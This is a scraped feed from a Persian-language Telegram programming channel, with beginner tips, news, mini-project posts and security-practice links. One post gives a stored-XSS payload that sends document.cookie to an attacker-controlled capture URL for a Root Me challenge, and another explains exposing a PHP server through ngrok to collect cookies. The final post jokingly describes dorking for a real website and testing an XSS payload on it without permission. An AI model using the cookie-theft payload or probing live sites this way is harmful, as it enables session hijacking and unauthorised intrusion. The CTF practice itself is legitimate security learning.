PAIREN (Programming Channel)
98 subscribers
326 photos
60 videos
31 files
270 links
SW4gVGhlIE5hbWUgT2YgR29k
به نام خدا

کانال برنامه نویسی پایرن برای تمام دوستداران برنامه نویسی. رونوشت(Copy) کاملاً آزاد است.

آدرس گیت‌هاب:
https://github.com/PAIREN1383

Owner: @V_d_P_h_K
Download Telegram
این پست برای افرادی هست که تازه می‌خوان وارد یک حوزه بشن و تازه کار هستند.

۱. تعیین حوزه‌ی مورد علاقه.
۲. تحقیق درباره‌ی حوزه‌ی مورد علاقه و پیش‌نیاز ها و زبان هایی که باید کار شود.
۳. تحقیق برای چیدن نقشه راه.
۴. تحقیق برای بهترین دوره های موجود.
۵. عضو بودن در جامعه های برنامه نویسی برای پیشرفت بهتر و یادگیری مطالب جدید.
۶. تمرین تمرین تمرین پشتکار و نظم.

این صرفا نظر من هست و به نظر من این کار ها باعث موفقیت شما در حوزه‌ای که میخواید کار کنید میشه.


#تازه_کار



@Pairen_Programmers
Today's learners, tomorrow's masters.

یادگیرندگان امروز، استادان فردا.
‏بنا به درخواست سازمان سنجش، اینترنت اپراتورهای تلفن همراه تا ساعت ۱۲:۳۰ دقیقه در مناطقی که آزمون سراسری برگزار می‌شود قطع است.

‌از این به بعد سازمان سنجش و امثالهم هم حق دارن درخواست قطع اینترنت بدن.


پ.ن: قدیم از دستگاه جمر استفاده میکردن حالا اینترنت قطع میکنن. :)



#خبر



@Pairen_Programmers
👍3
مینی پروژه‌ی بعدی قراره یک صفحه‌ی ثبت نام باشه اگه ایده‌ای دارید توی کامنت ها بگید. :)
🔥1
این منم.😐


#Fun



@PairenProgrammers
سطح تبلیغات بعضی کانال ها با سطح فریب دادن بچه دبستانی برابری می‌کنه.
(تبلیغ آخری تیری بر پیکر بی جان سطح تبلیغاتشون بود.)

#Fun



@Pairen_Progrmmers
👍4
PAIREN (Programming Channel)
Registration page1.rar
این هم از مینی پروژه‌ای که قرار بود صفحه‌ی ثبت نام باشه.

پ.ن: دفعه‌‌ی بعدی قرار هست که برای صفحه‌ی قبلی یک صفحه‌ی ثبت نام درست کنم.


#مینی_پروژه


#Pairen_Programmers
کسایی که باگ xss بلدن و با JavaScript آشنایی دارن این سایت می‌تونه براشون سرگرم کننده باشه. :)

لینک سایت:
https://alf.nu/alert1


#امینت


@Pairen_Programmers
این متن داخل عکس رو حتما بخونید و اگه اطلاعات شخصی توی رزومه‌تون براتون مهم هست توی جابینجا رزومه نسازید.


#خبر



@Pairen_Programmers
👍2
PAIREN (Programming Channel)
Registration page2.rar
این هم صفحه‌ی ثبت‌نام دایره‌ای.


پ.ن: دفعه‌ی بعد یک صفحه‌ی ورود پله‌ای میگذارم.


#مینی_پروژه


@Pairen_Programmers
Root Me is a platform for everyone to test and improve knowledge in computer security, hacking and CTFs.

Link:
https://www.root-me.org/?lang=en


این وب سایت برای تمرین کردن هکر ها طراحی شده و شما می‌رید و یک سری چالش که توی Root Me هست رو حل می‌کند و موقعی که حل میشه به شما یک کد داده میشه و وقتی کد رو وارد کنید به شما امتیاز اون چالش رو میده.
برای حل چالش ها شما نیاز به دانش برنامه نویسی، آشنایی با آسیب پذیری ها و بعضی از ابزار ها و هر چیزی که یک هکر نیاز داره رو نیاز دارید.


#امنیت


@Pairen_Programmers
شاید برای شما هم پیش اومده باشه که توی ماشین مجازی لینوکس ریختین و میخواید با php یک سرور روی لوکال هاست بسازد و به وسیله‌ی ngrok اون لینکی که روی لوکال هاست ساختین رو forward کنید و کوکی بردارید اما php سرور جواب نمیده و کار نمیکنه.
جوابش این هست که شما وقتی روی لوکال هاست می‌سازید اون فقط به لوکال هاست گوش میده ولی اگه شما روی
0.0.0.0:9889
بسازید به بقیه هم گوش میده.

این هم جوابی که یک نفر توی Stackoverflow نوشته:
https://stackoverflow.com/questions/46172700/i-cannot-reach-php-built-in-server-running-on-a-vm

❗️توجه: البته من خودم هنوز این راه حل رو امتحان نکردم که ببینم اگه همین کار رو کنم مشکل حل میشه یا نه ولی موقعی که میخواستم با php سرور کوکی بردارم اصلا php سرور جواب نمی‌داد.



#امنیت
#php



@Pairen_Programmers
👍1
PAIREN (Programming Channel)
شاید برای شما هم پیش اومده باشه که توی ماشین مجازی لینوکس ریختین و میخواید با php یک سرور روی لوکال هاست بسازد و به وسیله‌ی ngrok اون لینکی که روی لوکال هاست ساختین رو forward کنید و کوکی بردارید اما php سرور جواب نمیده و کار نمیکنه. جوابش این هست که شما وقتی…
میتونید به عوض php سرور از Request Inspector استفاده کنید و کوکی بردارید.
این برداشتن کوکی مال یکی از چالش های روت می هست.(وقتی پیلود رو سابمیت کردید، چند بار صفحه‌ی Request Inspector رو رفرش کنید و چند ثانیه صبر کنید تا ADMIN_COOKIE براتون ارسال بشه. گاهی اوقات لازمه چند بار پیلود رو سابمیت کنید تا بعد ADMIN_COOKIE براتون بیاد.)
چالش root me xss stored 1

برای برداشتن کوکی میتونید از این پیلود استفاده کنید.
<script>document.location="URL?c="+document.cookie</script>

توی قسمت 'URL' باید لینکی که از Request Inspector میگیرید بگذارید.



#امنیت
#XSS




@Pairen_Programmers
👍2
This media is not supported in your browser
VIEW IN TELEGRAM
حرفای خیلی جالبی زدن. :)
واقعاً باید در کنار تحقیق و یادگیری عمل هم کرد تا تجربه کسب کنیم.


#تازه_کار



@Pairen_Programmers
👍3
😂😂😂


پ.ن: امروز رفتم توی گوگل سرچ کردم درباره‌ی دورک هایی که برای xss استفاده میشه. دورک رو استفاده کردم و یک سایت رو پیدا کردم. رفتم توی تور سایت رو باز کردم توی قسمت سرچ نوشتم:
<script>alert(1)</script>
این رو که نوشتم و روی دکمه‌ی سرچ زدم دیدم نوشت بلاک شدید.😂😂😂


#Fun



@Pairen_Programmers
🔥3